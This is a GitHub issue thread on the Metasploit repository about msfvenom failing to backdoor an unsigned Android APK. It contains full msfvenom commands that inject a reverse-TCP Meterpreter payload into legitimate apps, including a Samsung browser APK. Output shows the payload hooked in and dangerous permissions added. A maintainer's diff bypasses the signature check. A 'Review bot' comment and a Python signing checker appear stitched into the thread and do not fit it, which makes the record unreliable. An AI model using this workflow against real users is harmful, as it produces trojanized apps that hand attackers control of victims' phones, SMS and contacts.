rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

Could not extract signing certificate owner: DOES NOT VERIFY #17610

Closed Drjacky closed 1 year ago

Drjacky commented 1 year ago

Summary

Could not extract signing certificate owner: DOES NOT VERIFY

Relevant information

➜  metasploit-framework git:(master) ✗ ./msfvenom -a dalvik --platform android -p android/meterpreter/reverse_tcp -x ~/Desktop/ttt.apk LHOST=192.168.0.150 LPORT=4444 -f raw -o /tmp/ttt-meterpreter.apk
Calling `DidYouMean::SPELL_CHECKERS.merge!(error_name => spell_checker)' has been deprecated. Please call `DidYouMean.correct_error(error_name, spell_checker)' instead.
Using APK template: /Users/userrrr/Desktop/ttt.apk
Error: Could not extract signing certificate owner: DOES NOT VERIFY
ERROR: Missing META-INF/MANIFEST.MF

I pulled the apk from the device and it's a working APK; I can install and run it without an issue.

github-actions[bot] commented 1 year ago

It looks like there's not enough information to replicate this issue. Please provide any relevant output and logs which may be useful in diagnosing the issue.

This includes:

The easier it is for us to replicate and debug an issue, the higher the chance of it being resolved.

gwillcox-r7 commented 1 year ago

Hmm, it's possible this may be the issue: the file is denoted to be a signed file somehow, and when it goes to try to re-sign the APK, it first couldn't extract the signing certificate owner, and then when it went to https://sourcegraph.com/github.com/rapid7/rex/-/blob/lib/rex/zip/jar.rb?L167-169&subtree=true it couldn't find the META-INF/MANIFEST.MF file to sign the file again properly.

That being said without the APK file and a way to replicate your results all I'm doing at this point is pure speculation until we have something where we are able to replicate the issue. Is there a way you could share the APK you found is causing this issue for you?

bcoles commented 1 year ago

Which APK are you using?

What is the output of:

keytool -J-Duser.language=en -printcert -jarfile ~/Desktop/ttt.apk
apksigner verify --print-certs ~/Desktop/ttt.apk

Drjacky commented 1 year ago

@bcoles

➜ ~ keytool -J-Duser.language=en -printcert -jarfile ~/Desktop/ttt.apk
Not a signed jar file

➜ ~ apksigner verify --print-certs ~/Desktop/ttt.apk
DOES NOT VERIFY
ERROR: Missing META-INF/MANIFEST.MF

@gwillcox-r7 Sorry, I cannot share it.

bcoles commented 1 year ago

Not a signed jar file

msfvenom does not support using unsigned APK files as templates. It assumes the file is signed.

As far as I'm aware there's no real reason that it can't support unsigned APK files. The backdoor_apk method supports unsigned APKs, but msfvenom does not first check if the APK file is signed. This was never implemented in msfvenom as it was a less common use case.

As a simple workaround, you could try bypassing the certificate parsing and re-signing code in lib/msf/core/payload/apk.rb. The easiest approach is to simply force signature to false in the call to the backdoor_apk method:

diff --git a/lib/msf/core/payload_generator.rb b/lib/msf/core/payload_generator.rb
index b70d813f56..79315f7cce 100644
--- a/lib/msf/core/payload_generator.rb
+++ b/lib/msf/core/payload_generator.rb
@@ -409,7 +409,7 @@ module Msf
         end
         cli_print "Using APK template: #{template}"
         apk_backdoor = ::Msf::Payload::Apk.new
-        raw_payload = apk_backdoor.backdoor_apk(template, generate_raw_payload)
+        raw_payload = apk_backdoor.backdoor_apk(template, generate_raw_payload, signature = false)
         gen_payload = raw_payload
       else
         if payload_module.is_a?(Msf::Payload::Windows::PayloadDBConf)
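Review bot: `signature = false` on the `+` line is a Ruby local-variable assignment whose value (`false`) is passed as the third positional argument, so it reads like a keyword argument but is not one; pass `false` directly with a comment naming the parameter, or better, check whether the template actually carries a signature and pass that result (e.g. `apk_backdoor.backdoor_apk(template, generate_raw_payload, template_is_signed)`), since as written every template, signed or not, now produces an unsigned APK.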

A quick test shows msfvenom generates an unsigned APK successfully with this change when given both a signed or unsigned APK as input. But I haven't tested whether the generated APK works.

# bundle exec ./msfvenom -x 'com.sec.android.app.sbrowser_11.0.00.73-1100073500_minAPI21(armeabi-v7a)(nodpi)_apkmirror.com.apk' -p android/meterpreter/reverse_tcp LHOST=192.168.200.130 LPORT=4444 -o asdf.apk
Calling `DidYouMean::SPELL_CHECKERS.merge!(error_name => spell_checker)' has been deprecated. Please call `DidYouMean.correct_error(error_name, spell_checker)' instead.
/usr/lib/x86_64-linux-gnu/ruby/3.0.0/stringio.so: warning: already initialized constant StringIO::VERSION
Using APK template: com.sec.android.app.sbrowser_11.0.00.73-1100073500_minAPI21(armeabi-v7a)(nodpi)_apkmirror.com.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.sec.android.app.sbrowser.ethct
[*] Loading /tmp/d20230221-2805087-tkbl0x/original/smali/com/sec/android/app/sbrowser/SBrowserApplication.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.READ_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
[*] Rebuilding apk with meterpreter injection as /tmp/d20230221-2805087-tkbl0x/output.apk
Payload size: 76160321 bytes
Saved as: asdf.apk

# file asdf.apk 
asdf.apk: Zip archive data, at least v2.0 to extract, compression method=deflate

# apksigner verify --print-certs asdf.apk 
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
DOES NOT VERIFY
ERROR: Missing META-INF/MANIFEST.MF

# keytool -J-Duser.language=en -printcert -jarfile asdf.apk 
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Not a signed jar file

Let me know if this works and I'll add supporting unsigned APKs to my TODO list.
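
A check of the kind described above as missing from msfvenom, written as an added example for this thread rather than Metasploit's own code: it classifies an APK's signing state from the zip structure alone, separating the v1 JAR signature entries (whose absence is what apksigner reports as "Missing META-INF/MANIFEST.MF") from a v2/v3 APK Signing Block, so an unsigned template can be recognised before certificate extraction is attempted. The sample APKs are constructed in-memory fixtures with placeholder signature contents; only the structural markers are real.

```python
import io
import struct
import zipfile

APK_SIG_BLOCK_MAGIC = b"APK Sig Block 42"  # trailer of an APK Signing Block (v2/v3)
V1_SIG_EXTS = (".RSA", ".DSA", ".EC")      # JAR (v1) signature block file suffixes
V2_BLOCK_ID = 0x7109871A                    # ID-value pair ID used by APK Signature Scheme v2

def _eocd_offset(data: bytes) -> int:
    """Offset of the End Of Central Directory record (an archive comment is not assumed)."""
    off = data.rfind(b"PK\x05\x06")
    if off < 0:
        raise ValueError("not a zip archive: EOCD record missing")
    return off

def apk_signing_state(data: bytes) -> dict:
    """Classify an APK's signing state from zip structure alone.

    v1 (JAR) signing leaves META-INF/MANIFEST.MF plus *.SF and *.RSA/.DSA/.EC
    entries; v2/v3 signing inserts an APK Signing Block whose 16-byte magic sits
    immediately before the central directory.  An APK with neither is what
    apksigner reports as DOES NOT VERIFY / Missing META-INF/MANIFEST.MF.
    """
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
    manifest = "META-INF/MANIFEST.MF" in names
    v1_block = any(n.startswith("META-INF/") and n.upper().endswith(V1_SIG_EXTS) for n in names)
    cd_off = struct.unpack_from("<I", data, _eocd_offset(data) + 16)[0]
    v2 = cd_off >= 16 and data[cd_off - 16:cd_off] == APK_SIG_BLOCK_MAGIC
    return {"v1": manifest and v1_block, "v2_or_v3": v2, "signed": (manifest and v1_block) or v2}

def build_sample_apk(v1: bool, v2: bool) -> bytes:
    """Constructed fixture: a tiny APK-shaped zip with placeholder signature content.
    Only the structural markers are real; no cryptographic signature is produced."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("AndroidManifest.xml", b"<placeholder/>")
        zf.writestr("classes.dex", b"dex\n035\x00")
        if v1:
            zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
            zf.writestr("META-INF/CERT.SF", "Signature-Version: 1.0\n")
            zf.writestr("META-INF/CERT.RSA", b"placeholder-pkcs7")
    data = buf.getvalue()
    if v2:  # splice an APK Signing Block in front of the central directory and re-point the EOCD
        eocd = _eocd_offset(data)
        cd_off = struct.unpack_from("<I", data, eocd + 16)[0]
        pair = struct.pack("<QI", 4 + 8, V2_BLOCK_ID) + b"\x00" * 8  # one ID-value pair, dummy value
        body = pair + struct.pack("<Q", len(pair) + 8 + 16) + APK_SIG_BLOCK_MAGIC
        block = struct.pack("<Q", len(body)) + body
        data = data[:cd_off] + block + data[cd_off:]
        eocd += len(block)
        data = data[:eocd + 16] + struct.pack("<I", cd_off + len(block)) + data[eocd + 20:]
    return data
```

Run against a real file with `apk_signing_state(open(path, "rb").read())`; a template reporting `signed: False` is exactly the case that trips the certificate-owner extraction above.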

Drjacky commented 1 year ago

@bcoles I added , signature = false) to /opt/homebrew/share/metasploit-framework/lib/msf/core/payload_generator.rb -> raw_payload = apk_backdoor.backdoor_apk(template, generate_raw_payload and got this:

➜  metasploit-framework git:(master) ✗ ./msfvenom -a dalvik --platform android -p android/meterpreter/reverse_tcp -x ~/Desktop/ttt.apk LHOST=192.168.0.150 LPORT=4444 -f raw -o /tmp/ttt-meterpreter.apk

Using APK template: /Users/userrrr/Desktop/ttt.apk
Error: Could not extract signing certificate owner: DOES NOT VERIFY
ERROR: Missing META-INF/MANIFEST.MF

bcoles commented 1 year ago

Are you using two different versions of Metasploit? It looks like you're running ./msfvenom from within a git repository, but updated the library in /opt/homebrew.

Drjacky commented 1 year ago

No, all of them are in /opt/homebrew/share/metasploit-framework/ as I have this in my zshrc:

eval "$(rbenv init - zsh)"
alias msfconsole="/opt/homebrew/share/metasploit-framework && ./msfconsole && cd -"
alias msfbinscan="/opt/homebrew/share/metasploit-framework && ./msfbinscan && cd -"
alias msfd="/opt/homebrew/share/metasploit-framework && ./msfd && cd -"
alias msfelfscan="/opt/homebrew/share/metasploit-framework && ./msfelfscan && cd -"
alias msfmachscan="/opt/homebrew/share/metasploit-framework && ./msfmachscan && cd -"
alias msfpescan="/opt/homebrew/share/metasploit-framework && ./msfpescan && cd -"
alias msfrop="/opt/homebrew/share/metasploit-framework && ./msfrop && cd -"
alias msfrpc="/opt/homebrew/share/metasploit-framework && ./msfrpc && cd -"
alias msfrpcd="/opt/homebrew/share/metasploit-framework && ./msfrpcd && cd -"
alias msfupdate="/opt/homebrew/share/metasploit-framework && ./msfupdate && cd -"
alias msfvenom="/opt/homebrew/share/metasploit-framework && ./msfvenom && cd -"

bcoles commented 1 year ago

No, all of them are in /opt/homebrew/share/metasploit-framework/ as I have this in my zshrc:

Do you have two copies of Metasploit? Have you edited the correct file for the version of Metasploit you're executing?

Drjacky commented 1 year ago

No, only one. Yes, I double checked:

(two screenshots attached, taken 2023-02-24 at 16:36:22 and 16:36:40)

After editing the file, should I make/install/do something before using the msfvenom?

Drjacky commented 1 year ago

Running it like: bundle exec ./msfvenom -a dalvik --platform android -p android/meterpreter/reverse_tcp -x ~/Desktop/ttt.apk LHOST=192.168.0.150 LPORT=4444 -f raw -o /tmp/ttt-meterpreter.apk worked. Thanks!

But anyway it failed:

[*] Rebuilding apk with meterpreter injection as /var/folders/4c/13yp5nx15q1_vfhb_cswvjt00000gn/T/d20230224-8812-glgijc/output.apk
[-] I: Using Apktool 2.7.0
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
Exception in thread "main" org.jf.util.ExceptionWithContext: Exception occurred while writing code_item for method Landroidx/annotation/InspectableProperty$ValueType;->values()[Landroidx/annotation/InspectableProperty$ValueType;
    at org.jf.dexlib2.writer.DexWriter.writeDebugAndCodeItems(DexWriter.java:1058)
    at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:354)
    at org.jf.dexlib2.writer.DexWriter.writeTo(DexWriter.java:309)
    at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:58)
    at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:37)
    at brut.androlib.Androlib.buildSourcesSmali(Androlib.java:437)
    at brut.androlib.Androlib.buildSources(Androlib.java:368)
    at brut.androlib.Androlib.build(Androlib.java:320)
    at brut.androlib.Androlib.build(Androlib.java:287)
    at brut.apktool.Main.cmdBuild(Main.java:263)
    at brut.apktool.Main.main(Main.java:82)
Caused by: org.jf.util.ExceptionWithContext: Error while writing instruction at code offset 0x2
    at org.jf.dexlib2.writer.DexWriter.writeCodeItem(DexWriter.java:1331)
    at org.jf.dexlib2.writer.DexWriter.writeDebugAndCodeItems(DexWriter.java:1054)
    ... 10 more
Caused by: org.jf.util.ExceptionWithContext: Unsigned short value out of range: 65538
    at org.jf.dexlib2.writer.DexDataWriter.writeUshort(DexDataWriter.java:116)
    at org.jf.dexlib2.writer.InstructionWriter.write(InstructionWriter.java:356)
    at org.jf.dexlib2.writer.DexWriter.writeCodeItem(DexWriter.java:1291)
    ... 11 more

Error: apktool execution failed

gwillcox-r7 commented 1 year ago

Crashes in apktool should probably be reported to https://github.com/iBotPeaches/Apktool. Good to know you managed to get this working on the msfvenom side of things though.

Drjacky commented 1 year ago

I'm gonna report it there but, @bcoles already created one in this repo: https://github.com/rapid7/metasploit-framework/issues/16338

bcoles commented 1 year ago

Unsigned short value out of range

This is a known issue and won't be fixed in apktool. There is currently no intention to fix it in msfvenom either.

Drjacky commented 1 year ago

[just to help, giving an idea] These have their own decompiler: https://github.com/androguard/androguard

bcoles commented 1 year ago

The original question has been answered.

The remaining DEX limit issue is a dupe of #16338. There is currently no plan to resolve this in msfvenom. Closing.